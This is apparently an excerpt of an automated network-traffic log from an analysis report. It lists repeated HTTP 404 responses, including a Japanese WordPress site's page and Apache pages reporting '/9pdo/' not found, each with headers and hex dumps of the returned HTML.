Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:30:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 18:30:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:21 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:26 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:29 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:40 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 18:30:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:31:01 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 18:31:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 